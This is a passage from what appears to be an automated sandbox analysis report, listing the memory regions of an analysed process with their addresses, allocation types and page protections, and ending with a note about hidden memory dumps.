page read and write
370B000
trusted library allocation
page read and write
8F3E000
trusted library allocation
page read and write
10057000
unkown
page read and write
2C10000
trusted library allocation
page read and write
3585000
trusted library allocation
page read and write
4E7000
heap
page read and write
57A3000
trusted library allocation
page read and write
2BA0000
trusted library allocation
page read and write
2E93000
trusted library allocation
page read and write
260000
heap
page read and write
320000
trusted library allocation
page read and write
371C000
trusted library allocation
page read and write
5AAB000
heap
page read and write
5AE9000
heap
page read and write
57A3000
trusted library allocation
page read and write
2F3E000
stack
page read and write
1AB000
heap
page read and write
5794000
trusted library allocation
page read and write
E9000
heap
page read and write
1AB000
heap
page read and write
57A3000
trusted library allocation
page read and write
320D000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
55A8000
heap
page read and write
5794000
trusted library allocation
page read and write
223000
trusted library allocation
page read and write
2CD0000
trusted library allocation
page read and write
5597000
heap
page read and write
370B000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
3090000
trusted library allocation
page read and write
556A000
heap
page read and write
36FB000
trusted library allocation
page read and write
281C000
stack
page read and write
39D4000
trusted library allocation
page read and write
36BC000
trusted library allocation
page read and write
7FF00132000
trusted library allocation
page execute and read and write
3020000
trusted library allocation
page read and write
2EC0000
trusted library allocation
page read and write
B80000
trusted library allocation
page read and write
40E000
stack
page read and write
3B69000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
3564000
trusted library allocation
page read and write
2FDF000
trusted library allocation
page read and write
36BA000
trusted library allocation
page read and write
2ECE000
trusted library allocation
page read and write
2C61000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
D8E000
stack
page read and write
2BEA000
heap
page execute and read and write
5794000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
36F2000
trusted library allocation
page read and write
627000
heap
page read and write
28E0000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
55AE000
heap
page read and write
578B000
trusted library allocation
page read and write
3453000
heap
page read and write
3585000
trusted library allocation
page read and write
25F0000
trusted library allocation
page read and write
30D3000
trusted library allocation
page read and write
597000
heap
page read and write
3462000
heap
page read and write
2C0E000
trusted library allocation
page read and write
23F0000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
5A86000
heap
page read and write
2E0E000
stack
page read and write
370C000
trusted library allocation
page read and write
5909000
heap
page read and write
1ED0000
trusted library allocation
page read and write
2E63000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
3459000
heap
page read and write
2D8E000
stack
page read and write
310000
heap
page read and write
2C0E000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
396A000
trusted library allocation
page read and write
33CE000
heap
page read and write
396A000
trusted library allocation
page read and write
BD2000
heap
page read and write
2C01000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
303A000
trusted library allocation
page read and write
2884000
heap
page read and write
346B000
heap
page read and write
2BD4000
trusted library allocation
page read and write
294D000
stack
page read and write
3585000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
31C0000
trusted library allocation
page read and write
3585000
trusted library allocation
page read and write
3464000
heap
page read and write
3429000
heap
page read and write
145000
heap
page read and write
210000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
3F3E000
trusted library allocation
page read and write
34D6000
trusted library allocation
page read and write
3593000
trusted library allocation
page read and write
33F5000
heap
page read and write
5DF000
heap
page read and write
35CE000
trusted library allocation
page read and write
3F3E000
trusted library allocation
page read and write
5B07000
heap
page read and write
2C10000
trusted library allocation
page read and write
36F3000
trusted library allocation
page read and write
151000
heap
page read and write
12C8C000
trusted library allocation
page read and write
260000
heap
page read and write
7EF97000
unkown
page read and write
3BAF000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
33CE000
heap
page read and write
AA0000
heap
page read and write
8E9E000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
510000
heap
page read and write
5AD8000
heap
page read and write
4E2000
heap
page read and write
8B6E000
trusted library allocation
page read and write
2C90000
unkown
page read and write
3F3B000
trusted library allocation
page read and write
2C54000
heap
page read and write
371C000
trusted library allocation
page read and write
3F3E000
trusted library allocation
page read and write
520000
heap
page read and write
2D70000
trusted library allocation
page read and write
2CD0000
trusted library allocation
page read and write
33DF000
heap
page read and write
8D2E000
trusted library allocation
page read and write
2A0000
heap
page read and write
7FF00200000
trusted library allocation
page read and write
150000
heap
page read and write
3B69000
trusted library allocation
page read and write
39C6000
trusted library allocation
page read and write
4B9000
heap
page read and write
314E000
stack
page read and write
118000
heap
page read and write
26D0000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
3213000
trusted library allocation
page read and write
33DF000
heap
page read and write
7FF00270000
trusted library allocation
page execute and read and write
1ED0000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
1B4A4000
heap
page read and write
154000
heap
page read and write
5794000
trusted library allocation
page read and write
5560000
heap
page read and write
2B3000
heap
page read and write
2BB2000
trusted library allocation
page read and write
D90000
heap
page read and write
370B000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
371C000
trusted library allocation
page read and write
1F17000
heap
page read and write
3F3B000
trusted library allocation
page read and write
370D000
trusted library allocation
page read and write
2930000
heap
page read and write
5D4000
heap
page read and write
147000
heap
page read and write
37AF000
trusted library allocation
page read and write
8C9E000
trusted library allocation
page read and write
990000
heap
page read and write
39FF000
trusted library allocation
page read and write
339A000
trusted library allocation
page read and write
1AB000
heap
page read and write
3457000
heap
page read and write
5B2C000
heap
page read and write
2C10000
trusted library allocation
page read and write
3639000
heap
page read and write
3765000
trusted library allocation
page read and write
7FF00280000
trusted library allocation
page read and write
2BD4000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
119000
heap
page read and write
1CF2000
trusted library section
page read and write
5A95000
heap
page read and write
2D0000
trusted library allocation
page read and write
5A86000
heap
page read and write
3626000
trusted library allocation
page read and write
10000
heap
page read and write
300E000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
1DF0000
heap
page execute and read and write
5A94000
heap
page read and write
10046000
unkown
page readonly
55A8000
heap
page read and write
33CE000
heap
page read and write
3F3E000
trusted library allocation
page read and write
36F6000
trusted library allocation
page read and write
677000
heap
page read and write
1ED0000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
33EE000
heap
page read and write
3205000
trusted library allocation
page read and write
5ADF000
heap
page read and write
5C7000
heap
page read and write
10046000
unkown
page readonly
2D0000
heap
page read and write
578B000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
558D000
heap
page read and write
28FE000
stack
page read and write
2B70000
trusted library allocation
page read and write
3442000
heap
page read and write
3620000
trusted library allocation
page read and write
279E000
stack
page read and write
1AB000
heap
page read and write
2DD0000
trusted library allocation
page read and write
20C000
stack
page read and write
3446000
heap
page read and write
25E0000
trusted library allocation
page read and write
854E000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
3205000
trusted library allocation
page read and write
10057000
unkown
page read and write
1005A000
unkown
page readonly
2B90000
trusted library allocation
page read and write
312E000
trusted library allocation
page read and write
3F3B000
trusted library allocation
page read and write
3980000
trusted library allocation
page read and write
36BC000
trusted library allocation
page read and write
330000
heap
page read and write
320D000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
564000
heap
page read and write
4190000
heap
page read and write
1D05000
heap
page read and write
2F5B000
trusted library allocation
page read and write
A80000
heap
page read and write
370B000
trusted library allocation
page read and write
2E80000
trusted library allocation
page read and write
5565000
heap
page read and write
33D4000
heap
page read and write
3400000
heap
page read and write
31C0000
trusted library allocation
page read and write
350000
heap
page read and write
5DD000
heap
page read and write
54D000
heap
page read and write
36BA000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
1005A000
unkown
page readonly
275D000
stack
page read and write
1F10000
heap
page read and write
3F46000
trusted library allocation
page read and write
2FBE000
unkown
page read and write
B10000
heap
page read and write
2FA5000
trusted library allocation
page read and write
3AF0000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page read and write
2F4000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
52D0000
trusted library allocation
page read and write
3B30000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
28C0000
trusted library allocation
page read and write
1C81E000
stack
page read and write
3446000
heap
page read and write
396A000
trusted library allocation
page read and write
26F3000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
2F83000
trusted library allocation
page read and write
2CFC000
stack
page read and write
5DB000
heap
page read and write
910E000
trusted library allocation
page read and write
23F0000
trusted library allocation
page read and write
2604000
trusted library allocation
page read and write
668000
heap
page read and write
5AD8000
heap
page read and write
3460000
heap
page read and write
3551000
trusted library allocation
page read and write
BB000
stack
page read and write
383B000
stack
page read and write
3BAF000
trusted library allocation
page read and write
2C50000
heap
page read and write
28B3000
trusted library allocation
page read and write
2FDE000
stack
page read and write
2EE8000
trusted library allocation
page read and write
3F3B000
trusted library allocation
page read and write
223000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
10046000
unkown
page readonly
320000
heap
page read and write
A6E000
trusted library allocation
page read and write
2BD0000
remote allocation
page read and write
36F9000
trusted library allocation
page read and write
420000
heap
page read and write
346B000
heap
page read and write
578000
heap
page read and write
10057000
unkown
page read and write
31C0000
trusted library allocation
page read and write
906E000
trusted library allocation
page read and write
2390000
heap
page read and write
10053000
unkown
page read and write
3455000
heap
page read and write
240D000
stack
page read and write
3585000
trusted library allocation
page read and write
5B0B000
heap
page read and write
30FE000
stack
page read and write
2F2D000
trusted library allocation
page read and write
2CD0000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
B04000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
12A000
heap
page read and write
2B000
heap
page read and write
3209000
trusted library allocation
page read and write
3416000
heap
page read and write
3B34000
trusted library allocation
page read and write
2F4000
heap
page read and write
2F4F000
trusted library allocation
page read and write
2FAE000
stack
page read and write
2800000
heap
page read and write
38000
heap
page read and write
3217000
trusted library allocation
page read and write
3626000
trusted library allocation
page read and write
3203000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
33C8000
heap
page read and write
3F15000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
8DBE000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
3538000
trusted library allocation
page read and write
534000
heap
page read and write
345B000
heap
page read and write
3585000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
906E000
trusted library allocation
page read and write
2FB0000
trusted library allocation
page read and write
371C000
trusted library allocation
page read and write
630000
heap
page read and write
7FF00100000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
3943000
trusted library allocation
page execute
3209000
trusted library allocation
page read and write
BC0000
trusted library allocation
page read and write
320D000
trusted library allocation
page read and write
2EAF000
trusted library allocation
page read and write
333000
heap
page read and write
30000
heap
page read and write
1CB000
heap
page read and write
558B000
heap
page read and write
10053000
unkown
page read and write
BA4000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
2DF3000
trusted library allocation
page read and write
A54000
trusted library allocation
page read and write
3969000
trusted library allocation
page read and write
2EA9000
trusted library allocation
page read and write
911E000
trusted library allocation
page read and write
2BE4000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
7FF002A0000
trusted library allocation
page execute and read and write
3459000
heap
page read and write
140000
heap
page read and write
3580000
trusted library allocation
page read and write
2F6F000
trusted library allocation
page read and write
268000
heap
page read and write
152000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
1DB000
stack
page read and write
3453000
heap
page read and write
3210000
trusted library allocation
page read and write
3442000
heap
page read and write
There are 1675 hidden memdumps, click here to show them.